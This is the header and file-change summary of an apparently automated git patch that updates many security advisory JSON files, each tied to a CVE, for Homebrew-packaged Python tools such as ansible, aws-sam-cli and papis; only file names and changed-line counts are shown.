From 80989c2155c7517eb54cfbdaf15cf88658baacd7 Mon Sep 17 00:00:00 2001 From: BrewTestBot <1589480+BrewTestBot@users.noreply.github.com> Date: Thu, 10 Sep 2026 21:36:47 +0000 Subject: [PATCH] Matched advisory candidates (shard 3c) Base: 577c983824b680a1491c3f6b64629943617b82e4 --- advisories/BREW-ansible@13-CVE-2008-0299.json | 10 +- advisories/BREW-ansible@13-CVE-2010-4340.json | 10 +- advisories/BREW-ansible@13-CVE-2012-3446.json | 10 +- advisories/BREW-ansible@13-CVE-2013-1633.json | 10 +- advisories/BREW-ansible@13-CVE-2013-2013.json | 10 +- advisories/BREW-ansible@13-CVE-2013-2030.json | 10 +- advisories/BREW-ansible@13-CVE-2013-2104.json | 10 +- advisories/BREW-ansible@13-CVE-2013-2166.json | 10 +- advisories/BREW-ansible@13-CVE-2013-2167.json | 10 +- advisories/BREW-ansible@13-CVE-2013-2233.json | 9 +- advisories/BREW-ansible@13-CVE-2013-2255.json | 10 +- advisories/BREW-ansible@13-CVE-2013-4259.json | 9 +- advisories/BREW-ansible@13-CVE-2013-4260.json | 9 +- advisories/BREW-ansible@13-CVE-2013-6480.json | 10 +- advisories/BREW-ansible@13-CVE-2014-0012.json | 10 +- advisories/BREW-ansible@13-CVE-2014-0105.json | 10 +- advisories/BREW-ansible@13-CVE-2014-1402.json | 10 +- advisories/BREW-ansible@13-CVE-2014-1829.json | 10 +- advisories/BREW-ansible@13-CVE-2014-1830.json | 10 +- advisories/BREW-ansible@13-CVE-2014-2686.json | 9 +- advisories/BREW-ansible@13-CVE-2014-3146.json | 10 +- advisories/BREW-ansible@13-CVE-2014-3498.json | 9 +- advisories/BREW-ansible@13-CVE-2014-4657.json | 9 +- advisories/BREW-ansible@13-CVE-2014-4658.json | 9 +- advisories/BREW-ansible@13-CVE-2014-4659.json | 9 +- advisories/BREW-ansible@13-CVE-2014-4660.json | 9 +- advisories/BREW-ansible@13-CVE-2014-4678.json | 9 +- advisories/BREW-ansible@13-CVE-2014-4966.json | 9 +- advisories/BREW-ansible@13-CVE-2014-4967.json | 9 +- advisories/BREW-ansible@13-CVE-2014-7144.json | 10 +- advisories/BREW-ansible@13-CVE-2014-7231.json | 10 +- advisories/BREW-ansible@13-CVE-2015-1852.json | 10 +- advisories/BREW-ansible@13-CVE-2015-2296.json | 10 +- advisories/BREW-ansible@13-CVE-2015-3206.json | 10 +- advisories/BREW-ansible@13-CVE-2015-3908.json | 9 +- advisories/BREW-ansible@13-CVE-2015-6240.json | 9 +- advisories/BREW-ansible@13-CVE-2015-8557.json | 10 +- .../BREW-ansible@13-CVE-2016-10745.json | 10 +- advisories/BREW-ansible@13-CVE-2016-3096.json | 9 +- advisories/BREW-ansible@13-CVE-2016-8614.json | 9 +- advisories/BREW-ansible@13-CVE-2016-8628.json | 9 +- advisories/BREW-ansible@13-CVE-2016-8647.json | 9 +- advisories/BREW-ansible@13-CVE-2016-9015.json | 10 +- advisories/BREW-ansible@13-CVE-2016-9587.json | 9 +- .../BREW-ansible@13-CVE-2017-18342.json | 10 +- advisories/BREW-ansible@13-CVE-2017-7466.json | 9 +- advisories/BREW-ansible@13-CVE-2017-7481.json | 9 +- advisories/BREW-ansible@13-CVE-2017-7550.json | 9 +- .../BREW-ansible@13-CVE-2018-1000805.json | 10 +- .../BREW-ansible@13-CVE-2018-10855.json | 9 +- .../BREW-ansible@13-CVE-2018-10874.json | 9 +- .../BREW-ansible@13-CVE-2018-10875.json | 9 +- .../BREW-ansible@13-CVE-2018-16837.json | 9 +- .../BREW-ansible@13-CVE-2018-16859.json | 9 +- .../BREW-ansible@13-CVE-2018-16876.json | 9 +- .../BREW-ansible@13-CVE-2018-18074.json | 10 +- .../BREW-ansible@13-CVE-2018-19787.json | 10 +- .../BREW-ansible@13-CVE-2018-20060.json | 10 +- .../BREW-ansible@13-CVE-2018-25091.json | 10 +- advisories/BREW-ansible@13-CVE-2018-7750.json | 10 +- .../BREW-ansible@13-CVE-2019-10156.json | 9 +- .../BREW-ansible@13-CVE-2019-10206.json | 9 +- .../BREW-ansible@13-CVE-2019-10217.json | 9 +- .../BREW-ansible@13-CVE-2019-10906.json | 10 +- .../BREW-ansible@13-CVE-2019-11236.json | 10 +- .../BREW-ansible@13-CVE-2019-11324.json | 10 +- .../BREW-ansible@13-CVE-2019-14846.json | 9 +- .../BREW-ansible@13-CVE-2019-14856.json | 9 +- .../BREW-ansible@13-CVE-2019-14858.json | 9 +- .../BREW-ansible@13-CVE-2019-14864.json | 9 +- .../BREW-ansible@13-CVE-2019-14904.json | 9 +- .../BREW-ansible@13-CVE-2019-14905.json | 9 +- .../BREW-ansible@13-CVE-2019-18874.json | 10 +- .../BREW-ansible@13-CVE-2019-20477.json | 10 +- advisories/BREW-ansible@13-CVE-2019-3828.json | 9 +- .../BREW-ansible@13-CVE-2020-10684.json | 9 +- .../BREW-ansible@13-CVE-2020-10685.json | 9 +- .../BREW-ansible@13-CVE-2020-10691.json | 9 +- .../BREW-ansible@13-CVE-2020-10729.json | 9 +- .../BREW-ansible@13-CVE-2020-10744.json | 9 +- .../BREW-ansible@13-CVE-2020-14330.json | 9 +- .../BREW-ansible@13-CVE-2020-14332.json | 9 +- .../BREW-ansible@13-CVE-2020-14343.json | 10 +- .../BREW-ansible@13-CVE-2020-14365.json | 9 +- advisories/BREW-ansible@13-CVE-2020-1733.json | 9 +- advisories/BREW-ansible@13-CVE-2020-1734.json | 9 +- advisories/BREW-ansible@13-CVE-2020-1735.json | 9 +- advisories/BREW-ansible@13-CVE-2020-1736.json | 9 +- advisories/BREW-ansible@13-CVE-2020-1737.json | 9 +- advisories/BREW-ansible@13-CVE-2020-1738.json | 9 +- advisories/BREW-ansible@13-CVE-2020-1739.json | 9 +- advisories/BREW-ansible@13-CVE-2020-1740.json | 9 +- advisories/BREW-ansible@13-CVE-2020-1746.json | 9 +- advisories/BREW-ansible@13-CVE-2020-1747.json | 10 +- advisories/BREW-ansible@13-CVE-2020-1753.json | 9 +- .../BREW-ansible@13-CVE-2020-25635.json | 9 +- .../BREW-ansible@13-CVE-2020-26137.json | 10 +- .../BREW-ansible@13-CVE-2020-27783.json | 10 +- .../BREW-ansible@13-CVE-2020-28493.json | 10 +- advisories/BREW-ansible@13-CVE-2020-7212.json | 10 +- .../BREW-ansible@13-CVE-2021-20178.json | 9 +- .../BREW-ansible@13-CVE-2021-20180.json | 9 +- .../BREW-ansible@13-CVE-2021-20191.json | 9 +- .../BREW-ansible@13-CVE-2021-20228.json | 9 +- .../BREW-ansible@13-CVE-2021-20270.json | 10 +- .../BREW-ansible@13-CVE-2021-21330.json | 10 +- .../BREW-ansible@13-CVE-2021-27291.json | 10 +- .../BREW-ansible@13-CVE-2021-28363.json | 10 +- .../BREW-ansible@13-CVE-2021-28957.json | 10 +- .../BREW-ansible@13-CVE-2021-33503.json | 10 +- advisories/BREW-ansible@13-CVE-2021-3583.json | 9 +- advisories/BREW-ansible@13-CVE-2021-3620.json | 9 +- .../BREW-ansible@13-CVE-2021-43818.json | 10 +- .../BREW-ansible@13-CVE-2021-46823.json | 18 +--- advisories/BREW-ansible@13-CVE-2022-0718.json | 10 +- advisories/BREW-ansible@13-CVE-2022-2309.json | 10 +- .../BREW-ansible@13-CVE-2022-24302.json | 10 +- .../BREW-ansible@13-CVE-2022-36087.json | 10 +- advisories/BREW-ansible@13-CVE-2022-3697.json | 9 +- .../BREW-ansible@13-CVE-2022-40896.json | 10 +- .../BREW-ansible@13-CVE-2022-40897.json | 10 +- .../BREW-ansible@13-CVE-2023-26302.json | 10 +- .../BREW-ansible@13-CVE-2023-26303.json | 10 +- .../BREW-ansible@13-CVE-2023-29483.json | 10 +- .../BREW-ansible@13-CVE-2023-32681.json | 10 +- .../BREW-ansible@13-CVE-2023-37276.json | 10 +- advisories/BREW-ansible@13-CVE-2023-4237.json | 10 +- .../BREW-ansible@13-CVE-2023-43804.json | 10 +- .../BREW-ansible@13-CVE-2023-45803.json | 10 +- .../BREW-ansible@13-CVE-2023-47627.json | 10 +- .../BREW-ansible@13-CVE-2023-47641.json | 10 +- .../BREW-ansible@13-CVE-2023-48795.json | 10 +- .../BREW-ansible@13-CVE-2023-49081.json | 10 +- .../BREW-ansible@13-CVE-2023-49082.json | 10 +- advisories/BREW-ansible@13-CVE-2023-5115.json | 9 +- advisories/BREW-ansible@13-CVE-2023-5764.json | 10 +- advisories/BREW-ansible@13-CVE-2024-0690.json | 10 +- .../BREW-ansible@13-CVE-2024-11079.json | 10 +- .../BREW-ansible@13-CVE-2024-22195.json | 10 +- .../BREW-ansible@13-CVE-2024-23334.json | 10 +- .../BREW-ansible@13-CVE-2024-23829.json | 10 +- .../BREW-ansible@13-CVE-2024-27306.json | 10 +- .../BREW-ansible@13-CVE-2024-30251.json | 10 +- .../BREW-ansible@13-CVE-2024-34064.json | 10 +- .../BREW-ansible@13-CVE-2024-35195.json | 10 +- advisories/BREW-ansible@13-CVE-2024-3651.json | 10 +- .../BREW-ansible@13-CVE-2024-37891.json | 10 +- .../BREW-ansible@13-CVE-2024-42367.json | 10 +- .../BREW-ansible@13-CVE-2024-47081.json | 10 +- .../BREW-ansible@13-CVE-2024-52303.json | 10 +- .../BREW-ansible@13-CVE-2024-52304.json | 10 +- .../BREW-ansible@13-CVE-2024-56201.json | 10 +- .../BREW-ansible@13-CVE-2024-56326.json | 10 +- advisories/BREW-ansible@13-CVE-2024-6345.json | 10 +- advisories/BREW-ansible@13-CVE-2024-8775.json | 10 +- advisories/BREW-ansible@13-CVE-2024-9902.json | 10 +- .../BREW-ansible@13-CVE-2025-14010.json | 9 +- .../BREW-ansible@13-CVE-2025-27516.json | 10 +- .../BREW-ansible@13-CVE-2025-47273.json | 10 +- .../BREW-ansible@13-CVE-2025-50181.json | 10 +- .../BREW-ansible@13-CVE-2025-50182.json | 10 +- .../BREW-ansible@13-CVE-2025-53643.json | 10 +- .../BREW-ansible@13-CVE-2025-61911.json | 10 +- .../BREW-ansible@13-CVE-2025-61912.json | 10 +- .../BREW-ansible@13-CVE-2025-66418.json | 10 +- .../BREW-ansible@13-CVE-2025-66471.json | 10 +- .../BREW-ansible@13-CVE-2025-69223.json | 10 +- .../BREW-ansible@13-CVE-2025-69224.json | 10 +- .../BREW-ansible@13-CVE-2025-69225.json | 10 +- .../BREW-ansible@13-CVE-2025-69226.json | 10 +- .../BREW-ansible@13-CVE-2025-69227.json | 10 +- .../BREW-ansible@13-CVE-2025-69228.json | 10 +- .../BREW-ansible@13-CVE-2025-69229.json | 10 +- .../BREW-ansible@13-CVE-2025-69230.json | 10 +- .../BREW-ansible@13-CVE-2025-69277.json | 10 +- .../BREW-ansible@13-CVE-2026-11332.json | 10 +- .../BREW-ansible@13-CVE-2026-21441.json | 10 +- .../BREW-ansible@13-CVE-2026-22815.json | 10 +- .../BREW-ansible@13-CVE-2026-23490.json | 10 +- .../BREW-ansible@13-CVE-2026-25645.json | 10 +- .../BREW-ansible@13-CVE-2026-30922.json | 22 ++--- .../BREW-ansible@13-CVE-2026-34513.json | 10 +- .../BREW-ansible@13-CVE-2026-34514.json | 10 +- .../BREW-ansible@13-CVE-2026-34515.json | 10 +- .../BREW-ansible@13-CVE-2026-34516.json | 10 +- .../BREW-ansible@13-CVE-2026-34517.json | 10 +- .../BREW-ansible@13-CVE-2026-34518.json | 10 +- .../BREW-ansible@13-CVE-2026-34519.json | 10 +- .../BREW-ansible@13-CVE-2026-34520.json | 10 +- .../BREW-ansible@13-CVE-2026-34525.json | 10 +- .../BREW-ansible@13-CVE-2026-34993.json | 10 +- .../BREW-ansible@13-CVE-2026-41066.json | 10 +- .../BREW-ansible@13-CVE-2026-44405.json | 10 +- .../BREW-ansible@13-CVE-2026-44431.json | 10 +- .../BREW-ansible@13-CVE-2026-44432.json | 10 +- advisories/BREW-ansible@13-CVE-2026-4539.json | 10 +- .../BREW-ansible@13-CVE-2026-45409.json | 10 +- .../BREW-ansible@13-CVE-2026-47265.json | 10 +- .../BREW-ansible@13-CVE-2026-50269.json | 10 +- .../BREW-ansible@13-CVE-2026-54273.json | 10 +- .../BREW-ansible@13-CVE-2026-54274.json | 10 +- .../BREW-ansible@13-CVE-2026-54275.json | 10 +- .../BREW-ansible@13-CVE-2026-54276.json | 10 +- .../BREW-ansible@13-CVE-2026-54277.json | 10 +- .../BREW-ansible@13-CVE-2026-54278.json | 10 +- .../BREW-ansible@13-CVE-2026-54279.json | 10 +- .../BREW-ansible@13-CVE-2026-54280.json | 10 +- .../BREW-ansible@13-CVE-2026-57585.json | 10 +- .../BREW-ansible@13-CVE-2026-59881.json | 10 +- .../BREW-ansible@13-CVE-2026-59884.json | 10 +- .../BREW-ansible@13-CVE-2026-59885.json | 10 +- .../BREW-ansible@13-CVE-2026-59886.json | 10 +- .../BREW-ansible@13-CVE-2026-59890.json | 10 +- .../BREW-ansible@13-CVE-2026-69243.json | 10 +- .../BREW-ansible@13-CVE-2026-69244.json | 10 +- .../BREW-aws-sam-cli-CVE-2013-1633.json | 10 +- .../BREW-aws-sam-cli-CVE-2013-4314.json | 10 +- .../BREW-aws-sam-cli-CVE-2014-0012.json | 10 +- .../BREW-aws-sam-cli-CVE-2014-1402.json | 10 +- .../BREW-aws-sam-cli-CVE-2014-1829.json | 10 +- .../BREW-aws-sam-cli-CVE-2014-1830.json | 10 +- .../BREW-aws-sam-cli-CVE-2015-2296.json | 10 +- .../BREW-aws-sam-cli-CVE-2015-8557.json | 10 +- .../BREW-aws-sam-cli-CVE-2016-10516.json | 10 +- .../BREW-aws-sam-cli-CVE-2016-10745.json | 10 +- .../BREW-aws-sam-cli-CVE-2016-9015.json | 10 +- .../BREW-aws-sam-cli-CVE-2017-18342.json | 10 +- .../BREW-aws-sam-cli-CVE-2018-1000656.json | 10 +- .../BREW-aws-sam-cli-CVE-2018-1000807.json | 10 +- .../BREW-aws-sam-cli-CVE-2018-1000808.json | 10 +- .../BREW-aws-sam-cli-CVE-2018-18074.json | 10 +- .../BREW-aws-sam-cli-CVE-2018-20060.json | 10 +- .../BREW-aws-sam-cli-CVE-2018-25091.json | 10 +- .../BREW-aws-sam-cli-CVE-2019-1010083.json | 10 +- .../BREW-aws-sam-cli-CVE-2019-10906.json | 10 +- .../BREW-aws-sam-cli-CVE-2019-11236.json | 10 +- .../BREW-aws-sam-cli-CVE-2019-11324.json | 10 +- .../BREW-aws-sam-cli-CVE-2019-14322.json | 10 +- .../BREW-aws-sam-cli-CVE-2019-14806.json | 10 +- .../BREW-aws-sam-cli-CVE-2019-20477.json | 10 +- .../BREW-aws-sam-cli-CVE-2020-14343.json | 10 +- .../BREW-aws-sam-cli-CVE-2020-1747.json | 10 +- .../BREW-aws-sam-cli-CVE-2020-26137.json | 10 +- .../BREW-aws-sam-cli-CVE-2020-28493.json | 10 +- .../BREW-aws-sam-cli-CVE-2020-28724.json | 10 +- .../BREW-aws-sam-cli-CVE-2020-7212.json | 10 +- .../BREW-aws-sam-cli-CVE-2021-20270.json | 10 +- .../BREW-aws-sam-cli-CVE-2021-27291.json | 10 +- .../BREW-aws-sam-cli-CVE-2021-28363.json | 10 +- .../BREW-aws-sam-cli-CVE-2021-29063.json | 10 +- .../BREW-aws-sam-cli-CVE-2021-33503.json | 10 +- .../BREW-aws-sam-cli-CVE-2022-24065.json | 10 +- .../BREW-aws-sam-cli-CVE-2022-40896.json | 10 +- .../BREW-aws-sam-cli-CVE-2022-40897.json | 10 +- .../BREW-aws-sam-cli-CVE-2022-40898.json | 10 +- .../BREW-aws-sam-cli-CVE-2023-23934.json | 10 +- .../BREW-aws-sam-cli-CVE-2023-25577.json | 10 +- .../BREW-aws-sam-cli-CVE-2023-26302.json | 10 +- .../BREW-aws-sam-cli-CVE-2023-26303.json | 10 +- .../BREW-aws-sam-cli-CVE-2023-30861.json | 10 +- .../BREW-aws-sam-cli-CVE-2023-32681.json | 10 +- .../BREW-aws-sam-cli-CVE-2023-43804.json | 10 +- .../BREW-aws-sam-cli-CVE-2023-45803.json | 10 +- .../BREW-aws-sam-cli-CVE-2023-46136.json | 10 +- .../BREW-aws-sam-cli-CVE-2024-22195.json | 10 +- .../BREW-aws-sam-cli-CVE-2024-34064.json | 10 +- .../BREW-aws-sam-cli-CVE-2024-34069.json | 10 +- .../BREW-aws-sam-cli-CVE-2024-35195.json | 10 +- .../BREW-aws-sam-cli-CVE-2024-3651.json | 10 +- .../BREW-aws-sam-cli-CVE-2024-37891.json | 10 +- .../BREW-aws-sam-cli-CVE-2024-47081.json | 10 +- .../BREW-aws-sam-cli-CVE-2024-49766.json | 10 +- .../BREW-aws-sam-cli-CVE-2024-49767.json | 10 +- .../BREW-aws-sam-cli-CVE-2024-56201.json | 10 +- .../BREW-aws-sam-cli-CVE-2024-56326.json | 10 +- .../BREW-aws-sam-cli-CVE-2024-6345.json | 10 +- .../BREW-aws-sam-cli-CVE-2025-27516.json | 10 +- .../BREW-aws-sam-cli-CVE-2025-3047.json | 9 +- .../BREW-aws-sam-cli-CVE-2025-3048.json | 9 +- .../BREW-aws-sam-cli-CVE-2025-47273.json | 10 +- .../BREW-aws-sam-cli-CVE-2025-47278.json | 10 +- .../BREW-aws-sam-cli-CVE-2025-50181.json | 10 +- .../BREW-aws-sam-cli-CVE-2025-50182.json | 10 +- .../BREW-aws-sam-cli-CVE-2025-66221.json | 10 +- .../BREW-aws-sam-cli-CVE-2025-66418.json | 10 +- .../BREW-aws-sam-cli-CVE-2025-66471.json | 10 +- .../BREW-aws-sam-cli-CVE-2026-21441.json | 10 +- .../BREW-aws-sam-cli-CVE-2026-21860.json | 10 +- .../BREW-aws-sam-cli-CVE-2026-24049.json | 10 +- .../BREW-aws-sam-cli-CVE-2026-25645.json | 10 +- .../BREW-aws-sam-cli-CVE-2026-27199.json | 10 +- .../BREW-aws-sam-cli-CVE-2026-27205.json | 10 +- .../BREW-aws-sam-cli-CVE-2026-27448.json | 10 +- .../BREW-aws-sam-cli-CVE-2026-27459.json | 10 +- .../BREW-aws-sam-cli-CVE-2026-28684.json | 10 +- .../BREW-aws-sam-cli-CVE-2026-44431.json | 10 +- .../BREW-aws-sam-cli-CVE-2026-44432.json | 10 +- .../BREW-aws-sam-cli-CVE-2026-4539.json | 10 +- .../BREW-aws-sam-cli-CVE-2026-45409.json | 10 +- .../BREW-aws-sam-cli-CVE-2026-59890.json | 10 +- advisories/BREW-ccm-CVE-2013-1633.json | 10 +- advisories/BREW-ccm-CVE-2017-18342.json | 10 +- advisories/BREW-ccm-CVE-2019-20477.json | 10 +- advisories/BREW-ccm-CVE-2020-14343.json | 10 +- advisories/BREW-ccm-CVE-2020-1747.json | 10 +- advisories/BREW-ccm-CVE-2022-40897.json | 10 +- advisories/BREW-ccm-CVE-2024-6345.json | 10 +- advisories/BREW-ccm-CVE-2025-47273.json | 10 +- advisories/BREW-ccm-CVE-2026-59890.json | 10 +- advisories/BREW-cekit-CVE-2014-0012.json | 10 +- advisories/BREW-cekit-CVE-2014-1402.json | 10 +- advisories/BREW-cekit-CVE-2016-10745.json | 10 +- advisories/BREW-cekit-CVE-2017-18342.json | 10 +- advisories/BREW-cekit-CVE-2019-10906.json | 10 +- advisories/BREW-cekit-CVE-2019-20477.json | 10 +- advisories/BREW-cekit-CVE-2020-14343.json | 10 +- advisories/BREW-cekit-CVE-2020-1747.json | 10 +- advisories/BREW-cekit-CVE-2020-28493.json | 10 +- advisories/BREW-cekit-CVE-2024-22195.json | 10 +- advisories/BREW-cekit-CVE-2024-34064.json | 10 +- advisories/BREW-cekit-CVE-2024-56201.json | 10 +- advisories/BREW-cekit-CVE-2024-56326.json | 10 +- advisories/BREW-cekit-CVE-2025-27516.json | 10 +- .../BREW-cloudiscovery-CVE-2011-4617.json | 10 +- .../BREW-cloudiscovery-CVE-2014-0012.json | 10 +- .../BREW-cloudiscovery-CVE-2014-1402.json | 10 +- .../BREW-cloudiscovery-CVE-2016-10745.json | 10 +- .../BREW-cloudiscovery-CVE-2016-9015.json | 10 +- .../BREW-cloudiscovery-CVE-2017-18342.json | 10 +- .../BREW-cloudiscovery-CVE-2018-20060.json | 10 +- .../BREW-cloudiscovery-CVE-2018-25091.json | 10 +- .../BREW-cloudiscovery-CVE-2019-10906.json | 10 +- .../BREW-cloudiscovery-CVE-2019-11236.json | 10 +- .../BREW-cloudiscovery-CVE-2019-11324.json | 10 +- .../BREW-cloudiscovery-CVE-2019-20477.json | 10 +- .../BREW-cloudiscovery-CVE-2020-14343.json | 10 +- .../BREW-cloudiscovery-CVE-2020-1747.json | 10 +- .../BREW-cloudiscovery-CVE-2020-26137.json | 10 +- .../BREW-cloudiscovery-CVE-2020-28493.json | 10 +- .../BREW-cloudiscovery-CVE-2020-7212.json | 10 +- .../BREW-cloudiscovery-CVE-2021-28363.json | 10 +- .../BREW-cloudiscovery-CVE-2021-33503.json | 10 +- .../BREW-cloudiscovery-CVE-2023-43804.json | 10 +- .../BREW-cloudiscovery-CVE-2023-45803.json | 10 +- .../BREW-cloudiscovery-CVE-2024-22195.json | 10 +- .../BREW-cloudiscovery-CVE-2024-34064.json | 10 +- .../BREW-cloudiscovery-CVE-2024-37891.json | 10 +- .../BREW-cloudiscovery-CVE-2024-53899.json | 10 +- .../BREW-cloudiscovery-CVE-2024-56326.json | 10 +- .../BREW-cloudiscovery-CVE-2025-27516.json | 10 +- .../BREW-cloudiscovery-CVE-2025-50181.json | 10 +- .../BREW-cloudiscovery-CVE-2025-50182.json | 10 +- .../BREW-cloudiscovery-CVE-2025-66418.json | 10 +- .../BREW-cloudiscovery-CVE-2025-66471.json | 10 +- .../BREW-cloudiscovery-CVE-2025-68146.json | 10 +- .../BREW-cloudiscovery-CVE-2025-69872.json | 10 +- .../BREW-cloudiscovery-CVE-2026-21441.json | 10 +- .../BREW-cloudiscovery-CVE-2026-22701.json | 10 +- .../BREW-cloudiscovery-CVE-2026-22702.json | 10 +- .../BREW-cloudiscovery-CVE-2026-44431.json | 10 +- advisories/BREW-darker-CVE-2024-21503.json | 10 +- advisories/BREW-darker-CVE-2026-32274.json | 10 +- advisories/BREW-hapless-CVE-2015-8557.json | 10 +- advisories/BREW-hapless-CVE-2019-18874.json | 10 +- advisories/BREW-hapless-CVE-2021-20270.json | 10 +- advisories/BREW-hapless-CVE-2021-27291.json | 10 +- advisories/BREW-hapless-CVE-2022-40896.json | 10 +- advisories/BREW-hapless-CVE-2023-26302.json | 10 +- advisories/BREW-hapless-CVE-2023-26303.json | 10 +- advisories/BREW-hapless-CVE-2026-4539.json | 10 +- advisories/BREW-legit-CVE-2022-24439.json | 10 +- advisories/BREW-legit-CVE-2023-40267.json | 10 +- advisories/BREW-legit-CVE-2023-40590.json | 10 +- advisories/BREW-legit-CVE-2023-41040.json | 10 +- advisories/BREW-legit-CVE-2024-22190.json | 10 +- advisories/BREW-legit-CVE-2026-42215.json | 10 +- advisories/BREW-legit-CVE-2026-42284.json | 10 +- advisories/BREW-legit-CVE-2026-44243.json | 10 +- advisories/BREW-legit-CVE-2026-44244.json | 10 +- advisories/BREW-legit-CVE-2026-67322.json | 13 ++- advisories/BREW-legit-CVE-2026-67323.json | 15 ++- advisories/BREW-legit-CVE-2026-67324.json | 5 +- advisories/BREW-legit-CVE-2026-67325.json | 15 ++- advisories/BREW-legit-CVE-2026-73619.json | 5 +- advisories/BREW-legit-CVE-2026-73620.json | 5 +- advisories/BREW-legit-CVE-2026-73621.json | 5 +- advisories/BREW-legit-CVE-2026-73622.json | 5 +- advisories/BREW-legit-CVE-2026-73623.json | 5 +- advisories/BREW-legit-CVE-2026-73625.json | 5 +- advisories/BREW-legit-CVE-2026-76217.json | 13 ++- advisories/BREW-legit-CVE-2026-76218.json | 13 ++- advisories/BREW-legit-CVE-2026-76219.json | 15 ++- advisories/BREW-legit-CVE-2026-76220.json | 13 ++- advisories/BREW-legit-CVE-2026-76221.json | 10 +- advisories/BREW-legit-CVE-2026-76222.json | 22 +++-- advisories/BREW-legit-CVE-2026-78675.json | 41 ++++++-- advisories/BREW-legit-CVE-2026-78676.json | 29 ++++-- advisories/BREW-legit-CVE-2026-78677.json | 41 ++++++-- advisories/BREW-legit-CVE-2026-78678.json | 27 +++-- advisories/BREW-octodns-CVE-2017-18342.json | 10 +- advisories/BREW-octodns-CVE-2019-20477.json | 10 +- advisories/BREW-octodns-CVE-2020-14343.json | 10 +- advisories/BREW-octodns-CVE-2020-1747.json | 10 +- advisories/BREW-octodns-CVE-2023-29483.json | 10 +- advisories/BREW-octodns-CVE-2024-3651.json | 10 +- advisories/BREW-octodns-CVE-2026-45409.json | 10 +- .../BREW-offlineimap-CVE-2012-4571.json | 10 +- .../BREW-offlineimap-CVE-2012-5577.json | 10 +- .../BREW-offlineimap-CVE-2012-5578.json | 10 +- .../BREW-offlineimap-CVE-2026-23949.json | 10 +- advisories/BREW-papis-CVE-2014-1829.json | 10 +- advisories/BREW-papis-CVE-2014-1830.json | 10 +- advisories/BREW-papis-CVE-2014-3146.json | 16 +-- advisories/BREW-papis-CVE-2015-2296.json | 10 +- advisories/BREW-papis-CVE-2015-8557.json | 10 +- advisories/BREW-papis-CVE-2016-10075.json | 10 +- advisories/BREW-papis-CVE-2016-9015.json | 10 +- advisories/BREW-papis-CVE-2017-18342.json | 10 +- advisories/BREW-papis-CVE-2018-18074.json | 10 +- advisories/BREW-papis-CVE-2018-19787.json | 16 +-- advisories/BREW-papis-CVE-2018-20060.json | 10 +- advisories/BREW-papis-CVE-2018-25091.json | 10 +- advisories/BREW-papis-CVE-2019-11236.json | 10 +- advisories/BREW-papis-CVE-2019-11324.json | 10 +- advisories/BREW-papis-CVE-2019-20477.json | 10 +- advisories/BREW-papis-CVE-2020-14343.json | 10 +- advisories/BREW-papis-CVE-2020-1747.json | 10 +- advisories/BREW-papis-CVE-2020-26137.json | 10 +- advisories/BREW-papis-CVE-2020-27783.json | 16 +-- advisories/BREW-papis-CVE-2020-7212.json | 10 +- advisories/BREW-papis-CVE-2021-20270.json | 10 +- advisories/BREW-papis-CVE-2021-27291.json | 10 +- advisories/BREW-papis-CVE-2021-28363.json | 10 +- advisories/BREW-papis-CVE-2021-28957.json | 16 +-- advisories/BREW-papis-CVE-2021-33503.json | 10 +- advisories/BREW-papis-CVE-2021-43818.json | 16 +-- advisories/BREW-papis-CVE-2022-2309.json | 16 +-- advisories/BREW-papis-CVE-2022-40896.json | 10 +- advisories/BREW-papis-CVE-2023-32681.json | 10 +- advisories/BREW-papis-CVE-2023-43804.json | 10 +- advisories/BREW-papis-CVE-2023-45803.json | 10 +- advisories/BREW-papis-CVE-2024-34062.json | 10 +- advisories/BREW-papis-CVE-2024-35195.json | 10 +- advisories/BREW-papis-CVE-2024-3651.json | 10 +- advisories/BREW-papis-CVE-2024-37891.json | 10 +- advisories/BREW-papis-CVE-2024-47081.json | 10 +- advisories/BREW-papis-CVE-2025-43859.json | 10 +- advisories/BREW-papis-CVE-2025-50181.json | 10 +- advisories/BREW-papis-CVE-2025-50182.json | 10 +- advisories/BREW-papis-CVE-2025-66418.json | 10 +- advisories/BREW-papis-CVE-2025-66471.json | 10 +- advisories/BREW-papis-CVE-2026-21441.json | 10 +- advisories/BREW-papis-CVE-2026-25645.json | 10 +- advisories/BREW-papis-CVE-2026-41066.json | 16 +-- advisories/BREW-papis-CVE-2026-44431.json | 10 +- advisories/BREW-papis-CVE-2026-44432.json | 10 +- advisories/BREW-papis-CVE-2026-4539.json | 10 +- advisories/BREW-papis-CVE-2026-45409.json | 10 +- advisories/BREW-papis-CVE-2026-49476.json | 10 +- advisories/BREW-papis-CVE-2026-49477.json | 10 +- advisories/BREW-papis-CVE-2026-7246.json | 8 +- advisories/BREW-papis-CVE-2026-84378.json | 93 ++++++++++++++++++ advisories/BREW-papis-CVE-2026-84379.json | 89 +++++++++++++++++ advisories/BREW-papis-CVE-2026-84380.json | 89 +++++++++++++++++ advisories/BREW-papis-CVE-2026-84381.json | 98 +++++++++++++++++++ advisories/BREW-papis-CVE-2026-84382.json | 89 +++++++++++++++++ advisories/BREW-python@3.9-CVE-2013-1629.json | 10 +- advisories/BREW-python@3.9-CVE-2013-1633.json | 10 +- advisories/BREW-python@3.9-CVE-2013-1888.json | 10 +- advisories/BREW-python@3.9-CVE-2013-5123.json | 10 +- advisories/BREW-python@3.9-CVE-2014-8991.json | 10 +- .../BREW-python@3.9-CVE-2019-20916.json | 10 +- advisories/BREW-python@3.9-CVE-2021-3572.json | 10 +- .../BREW-python@3.9-CVE-2022-40897.json | 10 +- .../BREW-python@3.9-CVE-2022-40898.json | 10 +- advisories/BREW-python@3.9-CVE-2023-5752.json | 10 +- advisories/BREW-python@3.9-CVE-2024-6345.json | 10 +- .../BREW-python@3.9-CVE-2025-47273.json | 10 +- advisories/BREW-python@3.9-CVE-2025-8869.json | 10 +- .../BREW-python@3.9-CVE-2026-13346.json | 10 +- advisories/BREW-python@3.9-CVE-2026-1703.json | 10 +- .../BREW-python@3.9-CVE-2026-24049.json | 10 +- advisories/BREW-python@3.9-CVE-2026-3219.json | 10 +- .../BREW-python@3.9-CVE-2026-59890.json | 10 +- advisories/BREW-python@3.9-CVE-2026-6357.json | 10 +- advisories/BREW-python@3.9-CVE-2026-8643.json | 10 +- advisories/BREW-snakeviz-CVE-2012-2374.json | 10 +- advisories/BREW-snakeviz-CVE-2014-9720.json | 10 +- advisories/BREW-snakeviz-CVE-2023-28370.json | 10 +- advisories/BREW-snakeviz-CVE-2024-52804.json | 10 +- advisories/BREW-snakeviz-CVE-2025-47287.json | 10 +- advisories/BREW-snakeviz-CVE-2025-67724.json | 10 +- advisories/BREW-snakeviz-CVE-2025-67725.json | 10 +- advisories/BREW-snakeviz-CVE-2025-67726.json | 10 +- 